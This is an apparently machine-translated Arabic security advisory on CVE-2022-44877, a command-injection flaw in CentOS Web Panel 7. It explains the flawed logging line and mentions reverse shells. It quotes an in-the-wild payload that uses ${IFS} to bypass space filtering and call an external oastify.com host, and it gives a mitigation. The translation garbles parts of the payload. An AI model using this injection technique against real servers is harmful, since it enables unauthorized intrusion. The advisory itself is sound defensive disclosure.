الفئة:
ذكاء نقاط الضعف
فئة نقاط الضعف الأمنية:
تنفيذ التعليمات البرمجية عن بُعد
غطاء الكهف:
CVE-2022-44877
السيرة الذاتية: 3.0 النتيجة:
NA (لم يتم تعيينه)
ملخص تنفيذي
تهديدتأثيرتخفيف
- تم العثور على ثغرة أمنية جديدة في تنفيذ الأوامر عن بُعد في بوابة إدارة الويب الخاصة بلوحة ويب Centos (Control) 7.
- يمكن لممثل التهديد استغلال الثغرة الأمنية بسهولة من خلال طلب HTTP مُصمم.
- يمكن الاستفادة من الثغرة الأمنية للحصول على غلاف عكسي والحفاظ على الثبات
- يمكن لممثل التهديد عن بُعد غير المصادق تنفيذ هجمات برامج الفدية أو استخراج البيانات.
- قم بالتحديث إلى أحدث إصدار لأن هذا يؤثر على لوحة ويب سينتوس 7 < v0.9.8.1147
- أحدث إصدار - v0.9.8.1148
التحقيق والتحليل
كلاود سيكأجرى فريق أبحاث التهديدات التابع لـ CentOS تحقيقًا لفهم التفاصيل الفنية لـ CVE-2022-44877، واستغلال عمليات تثبيت CentOS Web Panel 7 على مستوى الإنترنت.
من خلال مسار بحثنا، اكتشفنا أنه بعد الاستغلال، يمكن للمهاجم تنفيذ الأوامر عن بُعد بنفس مستوى الامتياز الذي تم تثبيت لوحة ويب CentOS عليه. في حالات متعددة، تم تحديد أن الامتياز الافتراضي لاستضافة التثبيت هو
«الجذر» وهو ما يعادل
«المسؤول» امتياز على ويندوز
.التحليل الفني - رمز إثبات المفهوم
أصدر باحث أمني POC بتاريخ
جيثب وفيديو POC على
يوتيوب في الخامس من يناير 2023 بعد الحصول على تأكيد من فريق Centos بأنه تم تصحيح عدد كافٍ من الخوادم.
عند تحليل رمز الاستغلال المشترك، تم تحديد أن الخلل يكمن في الوظيفة التي سجلت إدخالات غير صحيحة على اللوحة. فيما يلي نموذج لمقتطف الشفرة المسؤول عن كتابة المحتوى باسم الملف»
wrong_entry.log»
صدى «إدخال غير صحيح، عنوان IP، HTTP_request_URI» >>. /wrong_entry.log
علامات الاقتباس المزدوجة في الأمر أعلاه مسؤولة عن هذا التكوين الخاطئ، حيث أن هذه ميزة bash تساعد في تنفيذ الأمر. نظرًا لأن Http_request_uri يتم التحكم فيه من قبل المهاجم، يمكن لممثل التهديد إدراج أمر يتم تنفيذه على الخادم.
عندما يتم تنفيذ الأمر أعلاه، نحصل على اتصال مرة أخرى بقذيفة المستمع.
[معرف التسمية التوضيحية = «المرفق _22206" align= «alignnone» width="1115"]

رسم توضيحي لقذيفتين [/caption]
هناك العديد من الخوادم الضعيفة في البرية وبدأت الجهات الفاعلة في مجال التهديد في استغلالها باستخدام حمولة الاستغلال المذكورة أدناه.
[معرف التسمية التوضيحية = «المرفق _22207" align= «alignnone» width="1218"]

حمولة العينة [/caption]
فهم الحمولة
- ping$ {IFS} - nc$ {IFS} 2 دولار {IFS} 222 غرام md8w98u9qwf7x5z7kw73quwkd82.oastify.com يمكن أن يكون تم تبسيطها إلى بينغ -نك 2 222 غرام مد8 واط 98u9qwf7x5z7kw73quwkd82.oastify.com
- $ {IFS} هو متغير bash لإعطاء حرف مسافة واحد. يتم استخدام هذا لتجاوز التحقق من الأحرف السيئة في المساحة الفارغة.
- وبالتالي، نحاول الحصول على رد فعل من الخادم الضعيف.
[معرف التسمية التوضيحية = «المرفق _22208" align= «alignnone» العرض = «887"]

نحصل على تفاعل DNS التالي من الخادم الضعيف [/caption]
معلومات من OSINT - قابلية الاستغلال والحضور
تعد Centos Web Panel 7 أداة إدارة خادم مستخدمة على نطاق واسع. ينتج عن استعلام Shodan عن ذلك حوالي 436,000 خادم قد يكون عرضة لثغرة تنفيذ التعليمات البرمجية عن بُعد.
[معرف التسمية التوضيحية = «المرفق _22209" align= «alignnone» width="1681"]

عرض استعلام بحث يعرض الخوادم الضعيفة [/caption]
يمكن أيضًا ملاحظة نفس النمط من محركات البحث الأخرى مثل التعدادات.
[معرف التسمية التوضيحية = «المرفق _22210" align= «alignnone» width="1582"]

يُظهر استعلام بحث Censys الخوادم الضعيفة [/caption]
التخفيف
تعتبر الثغرة الأمنية عالية التأثير التي يمكن استغلالها بسهولة أيضًا هدفًا رئيسيًا للجهات الفاعلة في مجال التهديد. وبالنظر إلى أن POC أصبحت علنية الآن، فإنها تجعل مهمة الجهات الفاعلة في مجال التهديد أسهل بكثير. ومن ثم نوصي المستخدمين بالتحديث إلى أحدث إصدار،
v0.9.8.1148.
المراجع